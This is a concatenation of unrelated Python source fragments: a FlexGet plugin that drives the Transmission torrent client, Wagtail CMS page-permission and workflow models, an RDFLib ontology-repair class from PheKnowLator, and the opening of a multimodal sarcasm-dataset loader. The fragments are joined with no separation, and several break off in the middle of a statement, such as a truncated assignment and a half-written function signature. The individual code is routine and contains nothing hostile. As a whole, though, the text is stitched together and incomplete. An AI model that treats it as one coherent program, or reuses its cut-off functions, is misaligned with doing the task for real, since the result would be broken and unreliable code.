config.setdefault('main_file_ratio', 0.9)
if 'netrc' in config:
netrc_path = os.path.expanduser(config['netrc'])
try:
config['username'], _, config['password'] = netrc(netrc_path).authenticators(config['host'])
except IOError as e:
log.error('netrc: unable to open: %s' % e.filename)
except NetrcParseError as e:
log.error('netrc: %s, file: %s, line: %s' % (e.msg, e.filename, e.lineno))
return config
def create_rpc_client(self, config):
user, password = config.get('username'), config.get('password')
try:
cli = transmissionrpc.Client(config['host'], config['port'], user, password)
except TransmissionError as e:
if isinstance(e.original, HTTPHandlerError):
if e.original.code == 111:
raise plugin.PluginError("Cannot connect to transmission. Is it running?")
elif e.original.code == 401:
raise plugin.PluginError("Username/password for transmission is incorrect. Cannot connect.")
elif e.original.code == 110:
raise plugin.PluginError("Cannot connect to transmission: Connection timed out.")
else:
raise plugin.PluginError("Error connecting to transmission: %s" % e.original.message)
else:
raise plugin.PluginError("Error connecting to transmission: %s" % e.message)
return cli
def torrent_info(self, torrent, config):
done = torrent.totalSize > 0
vloc = None
best = None
for t in torrent.files().items():
tf = t[1]
if tf['selected']:
if tf['size'] <= 0 or tf['completed'] < tf['size']:
done = False
break
if not best or tf['size'] > best[1]:
best = (tf['name'], tf['size'])
if done and best and (100 * float(best[1]) / float(torrent.totalSize)) >= (config['main_file_ratio'] * 100):
vloc = ('%s/%s' % (torrent.downloadDir, best[0])).replace('/', os.sep)
return done, vloc
def check_seed_limits(self, torrent, session):
seed_limit_ok = True # will remain if no seed ratio defined
idle_limit_ok = True # will remain if no idle limit defined
if torrent.seedRatioMode == 1: # use torrent's own seed ratio limit
seed_limit_ok = torrent.uploadRatio >= torrent.seedRatioLimit
elif torrent.seedRatioMode == 0: # use global rules
if session.seedRatioLimited:
seed_limit_ok = torrent.uploadRatio >= session.seedRatioLimit
if torrent.seedIdleMode == 1: # use torrent's own idle limit
idle_limit_ok = torrent.date_active + timedelta(minutes=torrent.seedIdleLimit) < datetime.now()
elif torrent.seedIdleMode == 0: # use global rules
if session.idle_seeding_limit_enabled:
idle_limit_ok = torrent.date_active + timedelta(minutes=session.idle_seeding_limit) < datetime.now()
return seed_limit_ok, idle_limit_ok
def on_task_start(self, task, config):
try:
import transmissionrpc
from transmissionrpc import TransmissionError # noqa
from transmissionrpc import HTTPHandlerError # noqa
except:
raise plugin.PluginError('Transmissionrpc module version 0.11 or higher required.', log)
if [int(part) for part in transmissionrpc.__version__.split('.')] < [0, 11]:
raise plugin.PluginError('Transmissionrpc module version 0.11 or higher required, please upgrade', log)
# Mark rpc client for garbage collector so every task can start
# a fresh new according its own config - fix to bug #2804
self.client = None
config = self.prepare_config(config)
if config['enabled']:
if task.options.test:
log.info('Trying to connect to transmission...')
self.client = self.create_rpc_client(config)
if self.client:
log.info('Successfully connected to transmission.')
else:
log.error('It looks like there was a problem connecting to transmission.')
class PluginTransmissionInput(TransmissionBase):
schema = {
'anyOf': [
{'type': 'boolean'},
{
'type': 'object',
'properties': {
'host': {'type': 'string'},
'port': {'type': 'integer'},
'netrc': {'type': 'string', 'format': 'file'},
'username': {'type': 'string'},
'password': {'type': 'string'},
'enabled': {'type': 'boolean'},
'only_complete': {'type': 'boolean'},
},
'additionalProperties': False,
},
]
}
def prepare_config(self, config):
config = TransmissionBase.prepare_config(self, config)
config.setdefault('only_complete', False)
return config
def on_task_input(self, task, config):
config = self.prepare_config(config)
if not config['enabled']:
return
if not self.client:
self.client = self.create_rpc_client(config)
entries = []
# Hack/Workaround for http://flexget.com/ticket/2002
# TODO: Proper fix
if 'username' in config and 'password' in config:
self.client.http_handler.set_authentication(self.client.url, config['username'], config['password'])
session = self.client.get_session()
for torrent in self.client.get_torrents():
seed_ratio_ok, idle_limit_ok = self.check_seed_limits(torrent, session)
if config['only_complete'] and not (seed_ratio_ok and idle_limit_ok and torrent.progress == 100):
continue
entry = Entry(title=torrent.name,
url='',
torrent_info_hash=torrent.hashString,
content_size=torrent.totalSize / (1024 * 1024))
# Location of torrent is only valid if transmission is on same machine as flexget
if config['host'] in ('localhost', '127.0.0.1'):
entry['location'] = torrent.torrentFile
entry['url'] = 'file://' + torrent.torrentFile
for attr in ['id', 'comment', 'downloadDir', 'isFinished', 'isPrivate', 'ratio', 'status', 'date_active',
'date_added', 'date_done', 'date_started', 'priority', 'progress', 'secondsDownloading',
'secondsSeeding']:
try:
entry['transmission_' + attr] = getattr(torrent, attr)
except Exception:
log.debug('error when requesting transmissionrpc attribute %s', attr, exc_info=True)
entry['transmission_trackers'] = [t['announce'] for t in torrent.trackers]
entry['transmission_seed_ratio_ok'] = seed_ratio_ok
entry['transmission_idle_limit_ok'] = idle_limit_ok
entries.append(entry)
return entries
class PluginTransmission(TransmissionBase):
"""
Add url from entry url to transmission
Example::
transmission:
host: localhost
port: 9091
netrc: /home/flexget/.tmnetrc
username: myusername
password: <PASSWORD>
path: the download location
Default values for the config elements::
transmission:
host: localhost
port: 9091
enabled: yes
"""
schema = {
'anyOf': [
{'type': 'boolean'},
{
'type': 'object',
'properties': {
'host': {'type': 'string'},
'port': {'type': 'integer'},
'netrc': {'type': 'string'},
'username': {'type': 'string'},
'password': {'type': 'string'},
'action': {'type': 'string', 'enum': ['add', 'remove', 'purge', 'pause', 'resume']},
'path': {'type': 'string'},
'max_up_speed': {'type': 'number'},
'max_down_speed': {'type': 'number'},
'max_connections': {'type': 'integer'},
'ratio': {'type': 'number'},
'add_paused': {'type': 'boolean'},
'content_filename': {'type': 'string'},
'main_file_only': {'type': 'boolean'},
'main_file_ratio': {'type': 'number'},
'magnetization_timeout': {'type': 'integer'},
'enabled': {'type': 'boolean'},
'include_subs': {'type': 'boolean'},
'bandwidth_priority': {'type': 'number'},
'honor_limits': {'type': 'boolean'},
'include_files': one_or_more({'type': 'string'}),
'skip_files': one_or_more({'type': 'string'}),
'rename_like_files': {'type': 'boolean'},
'queue_position': {'type': 'integer'}
},
'additionalProperties': False
}
]
}
def prepare_config(self, config):
config = TransmissionBase.prepare_config(self, config)
config.setdefault('action', 'add')
config.setdefault('path', '')
config.setdefault('main_file_only', False)
config.setdefault('magnetization_timeout', 0)
config.setdefault('include_subs', False)
config.setdefault('rename_like_files', False)
config.setdefault('include_files', [])
return config
@plugin.priority(120)
def on_task_download(self, task, config):
"""
Call download plugin to generate the temp files we will load
into deluge then verify they are valid torrents
"""
config = self.prepare_config(config)
if not config['enabled']:
return
# If the download plugin is not enabled, we need to call it to get our temp .torrent files
if 'download' not in task.config:
download = plugin.get('download', self)
for entry in task.accepted:
if entry.get('transmission_id'):
# The torrent is already loaded in deluge, we don't need to get anything
continue
if config['action'] != 'add' and entry.get('torrent_info_hash'):
# If we aren't adding the torrent new, all we need is info hash
continue
download.get_temp_file(task, entry, handle_magnets=True, fail_html=True)
@plugin.priority(135)
def on_task_output(self, task, config):
config = self.prepare_config(config)
# don't add when learning
if task.options.learn:
return
if not config['enabled']:
return
# Do not run if there is nothing to do
if not task.accepted:
return
if self.client is None:
self.client = self.create_rpc_client(config)
if self.client:
log.debug('Successfully connected to transmission.')
else:
raise plugin.PluginError("Couldn't connect to transmission.")
session_torrents = self.client.get_torrents()
for entry in task.accepted:
if task.options.test:
log.info('Would %s %s in transmission.', config['action'], entry['title'])
continue
# Compile user options into appropriate dict
options = self._make_torrent_options_dict(config, entry)
torrent_info = None
for t in session_torrents:
if (t.hashString.lower() == entry.get('torrent_info_hash', '').lower() or
t.id == entry.get('transmission_id')):
torrent_info = t
log.debug('Found %s already loaded in transmission as %s', entry['title'], torrent_info.name)
break
if not torrent_info:
if config['action'] != 'add':
log.warning('Cannot %s %s because it is not loaded in transmission.',
config['action'], entry['title'])
continue
downloaded = not entry['url'].startswith('magnet:')
# Check that file is downloaded
if downloaded and 'file' not in entry:
entry.fail('`file` field missing?')
continue
# Verify the temp file exists
if downloaded and not os.path.exists(entry['file']):
tmp_path = os.path.join(task.manager.config_base, 'temp')
log.debug('entry: %s', entry)
log.debug('temp: %s', ', '.join(os.listdir(tmp_path)))
entry.fail("Downloaded temp file '%s' doesn't exist!?" % entry['file'])
continue
try:
if downloaded:
with open(entry['file'], 'rb') as f:
filedump = base64.b64encode(f.read()).decode('utf-8')
torrent_info = self.client.add_torrent(filedump, 30, **options['add'])
else:
# we need to set paused to false so the magnetization begins immediately
options['add']['paused'] = False
torrent_info = self.client.add_torrent(entry['url'], timeout=30, **options['add'])
except TransmissionError as e:
log.debug('TransmissionError', exc_info=True)
log.debug('Failed options dict: %s', options['add'])
msg = 'Error adding {} to transmission. TransmissionError: {}'.format(
entry['title'], e.message or 'N/A')
log.error(msg)
entry.fail(msg)
continue
log.info('"%s" torrent added to transmission', entry['title'])
# The info returned by the add call is incomplete, refresh it
torrent_info = self.client.get_torrent(torrent_info.id)
try:
total_size = torrent_info.totalSize
main_id = None
find_main_file = options['post'].get('main_file_only') or 'content_filename' in options['post']
skip_files = options['post'].get('skip_files')
# We need to index the files if any of the following are defined
if find_main_file or skip_files:
file_list | |
copy to the same tree otherwise it will be on infinite loop
if recursive and (self.page == destination or destination.is_descendant_of(self.page)):
return False
# reject inactive users early
if not self.user.is_active:
return False
# reject early if pages of this type cannot be created at the destination
if not self.page.specific_class.can_create_at(destination):
return False
# skip permission checking for super users
if self.user.is_superuser:
return True
# Inspect permissions on the destination
destination_perms = self.user_perms.for_page(destination)
if not destination.specific_class.creatable_subpage_models():
return False
# we always need at least add permission in the target
if 'add' not in destination_perms.permissions:
return False
return True
def can_view_revisions(self):
return not self.page_is_root
class PageViewRestriction(BaseViewRestriction):
page = models.ForeignKey(
'Page', verbose_name=_('page'), related_name='view_restrictions', on_delete=models.CASCADE
)
passed_view_restrictions_session_key = 'passed_page_view_restrictions'
class Meta:
verbose_name = _('page view restriction')
verbose_name_plural = _('page view restrictions')
def save(self, user=None, **kwargs):
"""
Custom save handler to include logging.
:param user: the user add/updating the view restriction
:param specific_instance: the specific model instance the restriction applies to
"""
specific_instance = self.page.specific
is_new = self.id is None
super().save(**kwargs)
if specific_instance:
PageLogEntry.objects.log_action(
instance=specific_instance,
action='wagtail.view_restriction.create' if is_new else 'wagtail.view_restriction.edit',
user=user,
data={
'restriction': {
'type': self.restriction_type,
'title': force_str(dict(self.RESTRICTION_CHOICES).get(self.restriction_type))
}
}
)
def delete(self, user=None, **kwargs):
"""
Custom delete handler to aid in logging
:param user: the user removing the view restriction
:param specific_instance: the specific model instance the restriction applies to
"""
specific_instance = self.page.specific
if specific_instance:
PageLogEntry.objects.log_action(
instance=specific_instance,
action='wagtail.view_restriction.delete',
user=user,
data={
'restriction': {
'type': self.restriction_type,
'title': force_str(dict(self.RESTRICTION_CHOICES).get(self.restriction_type))
}
}
)
return super().delete(**kwargs)
class WorkflowPage(models.Model):
page = models.OneToOneField(
'Page',
verbose_name=_('page'),
on_delete=models.CASCADE,
primary_key=True,
unique=True
)
workflow = models.ForeignKey(
'Workflow',
related_name='workflow_pages',
verbose_name=_('workflow'),
on_delete=models.CASCADE,
)
def get_pages(self):
"""
Returns a queryset of pages that are affected by this WorkflowPage link.
This includes all descendants of the page excluding any that have other WorkflowPages.
"""
descendant_pages = Page.objects.descendant_of(self.page, inclusive=True)
descendant_workflow_pages = WorkflowPage.objects.filter(page_id__in=descendant_pages.values_list('id', flat=True)).exclude(pk=self.pk)
for path, depth in descendant_workflow_pages.values_list('page__path', 'page__depth'):
descendant_pages = descendant_pages.exclude(path__startswith=path, depth__gte=depth)
return descendant_pages
class Meta:
verbose_name = _('workflow page')
verbose_name_plural = _('workflow pages')
class WorkflowTask(Orderable):
workflow = ParentalKey('Workflow', on_delete=models.CASCADE, verbose_name=_('workflow_tasks'),
related_name='workflow_tasks')
task = models.ForeignKey('Task', on_delete=models.CASCADE, verbose_name=_('task'), related_name='workflow_tasks',
limit_choices_to={'active': True})
class Meta(Orderable.Meta):
unique_together = [('workflow', 'task')]
verbose_name = _('workflow task order')
verbose_name_plural = _('workflow task orders')
class TaskManager(models.Manager):
def active(self):
return self.filter(active=True)
class Task(models.Model):
name = models.CharField(max_length=255, verbose_name=_('name'))
content_type = models.ForeignKey(
ContentType,
verbose_name=_('content type'),
related_name='wagtail_tasks',
on_delete=models.CASCADE
)
active = models.BooleanField(verbose_name=_('active'), default=True, help_text=_(
"Active tasks can be added to workflows. Deactivating a task does not remove it from existing workflows."))
objects = TaskManager()
admin_form_fields = ['name']
admin_form_readonly_on_edit_fields = ['name']
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if not self.id:
# this model is being newly created
# rather than retrieved from the db;
if not self.content_type_id:
# set content type to correctly represent the model class
# that this was created as
self.content_type = ContentType.objects.get_for_model(self)
def __str__(self):
return self.name
@property
def workflows(self):
"""Returns all ``Workflow`` instances that use this task"""
return Workflow.objects.filter(workflow_tasks__task=self)
@property
def active_workflows(self):
"""Return a ``QuerySet``` of active workflows that this task is part of"""
return Workflow.objects.active().filter(workflow_tasks__task=self)
@classmethod
def get_verbose_name(cls):
"""
Returns the human-readable "verbose name" of this task model e.g "Group approval task".
"""
# This is similar to doing cls._meta.verbose_name.title()
# except this doesn't convert any characters to lowercase
return capfirst(cls._meta.verbose_name)
@cached_property
def specific(self):
"""
Return this Task in its most specific subclassed form.
"""
# the ContentType.objects manager keeps a cache, so this should potentially
# avoid a database lookup over doing self.content_type. I think.
content_type = ContentType.objects.get_for_id(self.content_type_id)
model_class = content_type.model_class()
if model_class is None:
# Cannot locate a model class for this content type. This might happen
# if the codebase and database are out of sync (e.g. the model exists
# on a different git branch and we haven't rolled back migrations before
# switching branches); if so, the best we can do is return the page
# unchanged.
return self
elif isinstance(self, model_class):
# self is already the an instance of the most specific class
return self
else:
return content_type.get_object_for_this_type(id=self.id)
task_state_class = None
@classmethod
def get_task_state_class(self):
return self.task_state_class or TaskState
def start(self, workflow_state, user=None):
"""Start this task on the provided workflow state by creating an instance of TaskState"""
task_state = self.get_task_state_class()(workflow_state=workflow_state)
task_state.status = TaskState.STATUS_IN_PROGRESS
task_state.page_revision = workflow_state.page.get_latest_revision()
task_state.task = self
task_state.save()
task_submitted.send(sender=task_state.specific.__class__, instance=task_state.specific, user=user)
return task_state
@transaction.atomic
def on_action(self, task_state, user, action_name, **kwargs):
"""Performs an action on a task state determined by the ``action_name`` string passed"""
if action_name == 'approve':
task_state.approve(user=user, **kwargs)
elif action_name == 'reject':
task_state.reject(user=user, **kwargs)
def user_can_access_editor(self, page, user):
"""Returns True if a user who would not normally be able to access the editor for the page should be able to if the page is currently on this task.
Note that returning False does not remove permissions from users who would otherwise have them."""
return False
def page_locked_for_user(self, page, user):
"""Returns True if the page should be locked to a given user's edits. This can be used to prevent editing by non-reviewers."""
return False
def user_can_lock(self, page, user):
"""Returns True if a user who would not normally be able to lock the page should be able to if the page is currently on this task.
Note that returning False does not remove permissions from users who would otherwise have them."""
return False
def user_can_unlock(self, page, user):
"""Returns True if a user who would not normally be able to unlock the page should be able to if the page is currently on this task.
Note that returning False does not remove permissions from users who would otherwise have them."""
return False
def get_actions(self, page, user):
"""
Get the list of action strings (name, verbose_name, whether the action requires additional data - see
``get_form_for_action``) for actions the current user can perform for this task on the given page.
These strings should be the same as those able to be passed to ``on_action``
"""
return []
def get_form_for_action(self, action):
return TaskStateCommentForm
def get_template_for_action(self, action):
return ''
def get_task_states_user_can_moderate(self, user, **kwargs):
"""Returns a ``QuerySet`` of the task states the current user can moderate"""
return TaskState.objects.none()
@classmethod
def get_description(cls):
"""Returns the task description."""
return ''
@transaction.atomic
def deactivate(self, user=None):
"""Set ``active`` to False and cancel all in progress task states linked to this task"""
self.active = False
self.save()
in_progress_states = TaskState.objects.filter(task=self, status=TaskState.STATUS_IN_PROGRESS)
for state in in_progress_states:
state.cancel(user=user)
class Meta:
verbose_name = _('task')
verbose_name_plural = _('tasks')
class WorkflowManager(models.Manager):
def active(self):
return self.filter(active=True)
class Workflow(ClusterableModel):
name = models.CharField(max_length=255, verbose_name=_('name'))
active = models.BooleanField(verbose_name=_('active'), default=True, help_text=_(
"Active workflows can be added to pages. Deactivating a workflow does not remove it from existing pages."))
objects = WorkflowManager()
def __str__(self):
return self.name
@property
def tasks(self):
"""Returns all ``Task`` instances linked to this workflow"""
return Task.objects.filter(workflow_tasks__workflow=self).order_by('workflow_tasks__sort_order')
@transaction.atomic
def start(self, page, user):
"""Initiates a workflow by creating an instance of ``WorkflowState``"""
state = WorkflowState(page=page, workflow=self, status=WorkflowState.STATUS_IN_PROGRESS, requested_by=user)
state.save()
state.update(user=user)
workflow_submitted.send(sender=state.__class__, instance=state, user=user)
next_task_data = None
if state.current_task_state:
next_task_data = {
'id': state.current_task_state.task.id,
'title': state.current_task_state.task.name,
}
PageLogEntry.objects.log_action(
instance=page,
action='wagtail.workflow.start',
data={
'workflow': {
'id': self.id,
'title': self.name,
'status': state.status,
'next': next_task_data,
'task_state_id': state.current_task_state.id if state.current_task_state else None,
}
},
revision=page.get_latest_revision(),
user=user,
)
return state
@transaction.atomic
def deactivate(self, user=None):
"""Sets the workflow as inactive, and cancels all in progress instances of ``WorkflowState`` linked to this workflow"""
self.active = False
in_progress_states = WorkflowState.objects.filter(workflow=self, status=WorkflowState.STATUS_IN_PROGRESS)
for state in in_progress_states:
state.cancel(user=user)
WorkflowPage.objects.filter(workflow=self).delete()
self.save()
def all_pages(self):
"""
Returns a queryset of all the pages that this Workflow applies to.
"""
pages = Page.objects.none()
for workflow_page in self.workflow_pages.all():
pages |= workflow_page.get_pages()
return pages
class Meta:
verbose_name = _('workflow')
verbose_name_plural = _('workflows')
class GroupApprovalTask(Task):
groups = models.ManyToManyField(Group, verbose_name=_('groups'), help_text=_('Pages at this step in a workflow will be moderated or approved by these groups of users'))
admin_form_fields = Task.admin_form_fields + ['groups']
admin_form_widgets = {
'groups': forms.CheckboxSelectMultiple,
}
def start(self, workflow_state, user=None):
if workflow_state.page.locked_by:
# If the person who locked the page isn't in one of the groups, unlock the page
if not workflow_state.page.locked_by.groups.filter(id__in=self.groups.all()).exists():
workflow_state.page.locked = False
workflow_state.page.locked_by = None
workflow_state.page.locked_at = None
workflow_state.page.save(update_fields=['locked', 'locked_by', 'locked_at'])
return super().start(workflow_state, user=user)
def user_can_access_editor(self, page, | |
for x in self.ont_graph if bad_content in str(x[0]) or bad_content in str(x[2])]
for e in bad_triple: # repair bad triple -- assuming for now the errors are mis-typed string errors
self.ont_graph.add((e[0], e[1], Literal(str(e[2]), datatype=schema.string))); self.ont_graph.remove(e)
self.ontology_info[key]['ValueErrors'] = errors[error_key] # update ontology information dictionary
return None
def fixes_identifier_errors(self) -> None:
"""Identifies identifier prefix errors (e.g. "PRO" for the Protein Ontology, which should be "PR"). This is a
tricky task to do in an automated manner and is something that should be updated if any new ontologies are
added to the PheKnowLator build. Currently it checks and logs any hits, but only fixes the following known
errors: Vaccine Ontology: "PRO" which should be "PR".
Returns:
None.
"""
log_str = 'Fixing Identifier Errors'; print(log_str); logger.info(log_str)
known_errors = ['PRO', 'PR'] # known errors
kg_classes, bad_cls, key = gets_ontology_classes(self.ont_graph), set(), self.ont_file_location
class_list = [res for res in kg_classes if isinstance(res, URIRef) and 'obo/' in str(res)]
all_cls = set([x.split('/')[-1].split('_')[0] for x in class_list])
errors = [x for x in all_cls if any(i for i in all_cls if i != x and (i in x or x in i))]
self.ontology_info[key]['IdentifierErrors'] = 'Possible ' + '-'.join(errors) if len(errors) > 0 else 'None'
for edge in self.ont_graph:
if 'http://purl.obolibrary.org/obo/{}_'.format(known_errors[0]) in str(edge[0]):
self.ont_graph.add((URIRef(str(edge[0]).replace(known_errors[0], known_errors[1])), edge[1], edge[2]))
self.ont_graph.remove(edge); bad_cls.add(str(edge[0]))
if 'http://purl.obolibrary.org/obo/{}_'.format(known_errors[0]) in str(edge[2]):
self.ont_graph.add((edge[0], edge[1], URIRef(str(edge[2]).replace(known_errors[0], known_errors[1]))))
self.ont_graph.remove(edge); bad_cls.add(str(edge[2]))
self.ontology_info[key]['IdentifierErrors'] = ', '.join(list(bad_cls)) if len(bad_cls) > 0 else 'None'
return None
def path_finder(self, triples: List, master_triples: Set) -> Set:
"""Method takes a triple an RDFLib graph object and searches the graph to return all triples associated with
BNodes in the input triple list.
Args:
triples: A list of triples where each item in the list is an RDFLib object.
master_triples: None or a list of triples where each item in the list is an RDFLib object.
Returns:
triple_list: A set of triples, where each item in the list is an RDFLib object.
"""
if len(triples) != 0 and len([x for x in triples if isinstance(x[0], BNode)]) > 0:
s, p, o = triples.pop(0)
if isinstance(s, BNode) and (s, p, o) not in master_triples:
master_triples |= {(s, p, o)}
out_edges = set(self.ont_graph.triples((s, None, None)))
in_edges = set(self.ont_graph.triples((None, None, s)))
new_trips = [x for x in out_edges | in_edges if x not in triples and x not in master_triples]
new_bnodes = [x for x in new_trips if isinstance(x[2], BNode)]
if len(new_trips) > 0 and len(new_bnodes) > 0: triples += new_trips
else: master_triples |= set(new_trips)
else:
if (s, p, o) not in master_triples: master_triples |= {(s, p, o)}
return self.path_finder(triples, master_triples)
else: return master_triples | set(triples)
def removes_deprecated_obsolete_entities(self) -> None:
"""Identifies and removes all deprecated and obsolete classes.
Returns:
None.
"""
log_str = 'Removing Deprecated and Obsolete Classes'; print(log_str); logger.info(log_str)
ont, key = self.ont_file_location.split('/')[-1].split('_')[0], self.ont_file_location
dep_cls = set(self.ont_graph.subjects(OWL.deprecated, None))
obs_cls = set(self.ont_graph.subjects(RDFS.subClassOf, oboinowl.ObsoleteClass))
obs_oth = set([x[0] for x in self.ont_graph if
(str(x[2]).startswith('OBSOLETE. ') or
str(x[2]).lower().startswith('obsolete ')) and x[0] not in obs_cls | dep_cls])
for node in tqdm(dep_cls | obs_cls | obs_oth):
axioms = set(self.ont_graph.triples((node, None, None))) | set(self.ont_graph.triples((None, None, node)))
bnode_triples = set([x for x in axioms if isinstance(x[0], BNode)])
triples = self.path_finder(list(bnode_triples), set())
self.ont_graph = remove_edges_from_graph(self.ont_graph, axioms | triples)
self.ontology_info[key]['Deprecated'] = dep_cls if len(dep_cls) > 0 else 'None'
self.ontology_info[key]['Obsolete'] = obs_cls if len(obs_cls | obs_oth) > 0 else 'None'
return None
def fixes_punning_errors(self) -> None:
"""Identifies and resolves three types of punning or entity redeclaration errors:
(1) Entities typed as an owl:Class and owl:ObjectProperty --> removes owl:ObjectProperty
(2) Entities typed as an owl:Class and owl:NamedIndividual --> removes owl:NamedIndividual
(3) Entities typed as an OWL:ObjectProperty and owl:AnnotationProperty --> removes owl:AnnotationProperty
- Any owl:ObjectProperty redeclared as an owl:AnnotationProperty never used in other triples are removed
Returns:
None.
"""
log_str = 'Resolving Punning Errors'; print(log_str); logger.info(log_str)
key, bad_cls, bad_obj = self.ont_file_location, set(), set()
onts_entities = set([x[0] for x in tqdm(self.ont_graph)])
for x in tqdm(onts_entities):
ent_types = list(self.ont_graph.triples((x, RDF.type, None)))
if len(ent_types) > 1:
if not any([x for x in ent_types if 'owl' not in str(x[2])]):
# class + object properties --> remove object properties
class_prop, obj_prop = (x, RDF.type, OWL.Class), (x, RDF.type, OWL.ObjectProperty)
if class_prop in ent_types and obj_prop in ent_types and str(x) not in bad_cls:
self.ont_graph.remove(obj_prop); bad_cls.add(str(x))
# class + individual --> remove individual
class_prop, ind_prop = (x, RDF.type, OWL.Class), (x, RDF.type, OWL.NamedIndividual)
if class_prop in ent_types and ind_prop in ent_types and str(x) not in bad_cls:
self.ont_graph.remove(ind_prop); bad_cls.add(str(x))
# object property + annotation property --> remove annotation property
obj_prop, a_prop = (x, RDF.type, OWL.ObjectProperty), (x, RDF.type, OWL.AnnotationProperty)
if obj_prop in ent_types and a_prop in ent_types and str(x) not in bad_obj:
self.ont_graph.remove(a_prop); bad_obj.add(str(x))
# check if the object property is used beyond definition -- if not, delete it
e = set(self.ont_graph.triples((x, None, None))) | set(self.ont_graph.triples((None, None, x)))
val_nodes = [i for i in e if len(
[j[2] for j in list(self.ont_graph.triples((i[0], RDF.type, OWL.Class)))] +
[j[2] for j in list(self.ont_graph.triples((i[0], RDF.type, OWL.NamedIndividual)))] +
[j[2] for j in list(self.ont_graph.triples((None, OWL.someValuesFrom, i[0])))]) > 0]
if len(val_nodes) == 0: self.ont_graph.remove((x, None, None))
self.ontology_info[key]['PunningErrors - Classes'] = ', '.join(bad_cls) if len(bad_cls) > 0 else 'None'
self.ontology_info[key]['PunningErrors - ObjectProperty'] = ', '.join(bad_obj) if len(bad_obj) > 0 else 'None'
return None
def normalizes_duplicate_classes(self) -> None:
"""Makes sure that all classes representing the same entity are connected to each other. For example, the
Sequence Ontology, ChEBI, PRotein Ontology all include terms for protein, but none of these classes are
connected to each other. The follow classes occur in all of the ontologies used in the current build and have
to be normalized so that there are not multiple versions of the same concept:
- Gene: VO OGG_0000000002. Make the OGG class a subclass of SO gene (SO_0000704)
- Protein: SO_0000104, PR_000000001, CHEBI_36080. Make CHEBI and PR a subclass of SO protein (SO_0000104)
- Disorder: VO OGMS_0000045. Make OGMS a subclass of MONDO disease (MONDO_0000001)
- Antigen: VO OBI_1110034. Make OBI a subclass of CHEBI antigen (CHEBI_59132)
- Gelatin: VO_0003030. Make the VO a subclass of CHEBI gelatin (CHEBI_5291)
- Hormone: VO FMA_12278. Make FMA a subclass of CHEBI hormone (CHEBI_24621)
Returns:
None.
"""
log_str = 'Normalizing Duplicate Concepts'; print(log_str); logger.info(log_str)
self.ont_graph.add((obo.OGG_0000000002, RDFS.subClassOf, obo.SO_0000704)) # fix gene class inconsistencies
self.ont_graph.add((obo.PR_000000001, RDFS.subClassOf, obo.SO_0000104)) # fix protein class inconsistencies
self.ont_graph.add((obo.CHEBI_36080, RDFS.subClassOf, obo.SO_0000104)) # fix protein class inconsistencies
self.ont_graph.add((obo.OGMS_0000045, RDFS.subClassOf, obo.MONDO_0000001)) # fix disorder class inconsistencies
self.ont_graph.add((obo.OBI_1110034, RDFS.subClassOf, obo.CHEBI_59132)) # fix antigen class inconsistencies
self.ont_graph.add((obo.VO_0003030, RDFS.subClassOf, obo.CHEBI_5291)) # fix gelatin class inconsistencies
self.ont_graph.add((obo.FMA_12278, RDFS.subClassOf, obo.CHEBI_24621)) # fix hormone class inconsistencies
# update ontology information dictionary
results = ['OGG_0000000002 rdfs:subClassOf SO_0000704', 'PR_000000001 rdfs:subClassOf SO_0000104',
'CHEBI_36080 rdfs:subClassOf SO_0000104', 'OGMS_0000045 rdfs:subClassOf MONDO_0000001',
'OBI_1110034 rdfs:subClassOf CHEBI_59132', 'VO_0003030 rdfs:subClassOf CHEBI_5291',
'FMA_12278 rdfs:subClassOf CHEBI_24621']
self.ontology_info[self.ont_file_location]['Normalized - Duplicates'] = ', '.join(results)
return None
def normalizes_existing_classes(self) -> None:
"""Checks for inconsistencies in ontology classes that overlap with non-ontology entity identifiers (e.g. if
HP includes HGNC identifiers, but PheKnowLator utilizes Entrez gene identifiers). While there are other types of
identifiers, we focus primarily on resolving the genomic types, since we have a master dictionary we can used to
help with this (Merged_gene_rna_protein_identifiers.pkl). This can be updated in future iterations to include
other types of identifiers, but given our detailed examination of the v2.0.0 ontologies, these were the
identifier types that needed repair.
Note. In the future, this method can be expanded to replace identifiers in annotation axioms (i.e. updating
Literals, in addition to the URIRefs that currently being updated).
Returns:
None.
"""
log_str = 'Normalizing Existing Classes'; print(log_str); logger.info(log_str)
ents, missing = None, []
non_ont = set([x for x in gets_ontology_classes(self.ont_graph)])
hgnc = set([x for x in non_ont if 'hgnc' in str(x).lower()])
url, g = 'http://www.ncbi.nlm.nih.gov/gene/', self.gene_ids
for node in tqdm(hgnc):
trips = list(self.ont_graph.triples((node, None, None))) + list(self.ont_graph.triples((None, None, node)))
nd = 'hgnc_id_' + re.findall(r'\d.*', str(node).split('/')[-1])[0]
gene_dat = [str(x[2]).strip(' (human)') for x in trips if x[1] == RDFS.label]
if nd in g.keys():
ents = [URIRef(url + x.split('_')[-1]) | |
import os
import sys
import re
import json
import pickle
import h5py
import nltk
import numpy as np
import jsonlines
from collections import defaultdict
from sklearn.model_selection import StratifiedKFold
import config
def pickle_loader(filename):
if sys.version_info[0] < 3:
return pickle.load(open(filename, 'rb'))
else:
return pickle.load(open(filename, 'rb'), encoding="latin1")
class AudioDataLoader:
DATA_PATH_JSON = "./data/sarcasm_data.json"
AUDIO_PICKLE = "./data/audio_features.p"
INDICES_FILE = "./data/split_indices.p"
GLOVE_DICT = "./data/glove_full_dict.p"
BERT_TARGET_EMBEDDINGS = "./data/bert-output.jsonl"
BERT_CONTEXT_EMBEDDINGS = "./data/bert-output-context.jsonl"
UTT_ID = 0
CONTEXT_ID = 2
SHOW_ID = 5
UNK_TOKEN = "<UNK>"
PAD_TOKEN = "<PAD>"
def __init__(self, config):
self.config = config
dataset_json = json.load(open(self.DATA_PATH_JSON))
if config.use_bert and config.use_target_text:
text_bert_embeddings = []
with jsonlines.open(self.BERT_TARGET_EMBEDDINGS) as reader:
# Visit each target utterance
for obj in reader:
CLS_TOKEN_INDEX = 0
features = obj['features'][CLS_TOKEN_INDEX]
bert_embedding_target = []
for layer in [0,1,2,3]:
bert_embedding_target.append(np.array(features["layers"][layer]["values"]))
bert_embedding_target = np.mean(bert_embedding_target, axis=0)
text_bert_embeddings.append(np.copy(bert_embedding_target))
else:
text_bert_embeddings = None
if config.use_context:
context_bert_embeddings = self.loadContextBert(dataset_json)
else:
context_bert_embeddings = None
if config.use_target_audio:
audio_features = pickle_loader(self.AUDIO_PICKLE)
else:
audio_features = None
if config.use_target_video:
video_features_file = h5py.File('data/features/utterances_final/resnet_pool5.hdf5')
context_video_features_file = h5py.File('data/features/context_final/resnet_pool5.hdf5')
else:
video_features_file = None
context_video_features_file = None
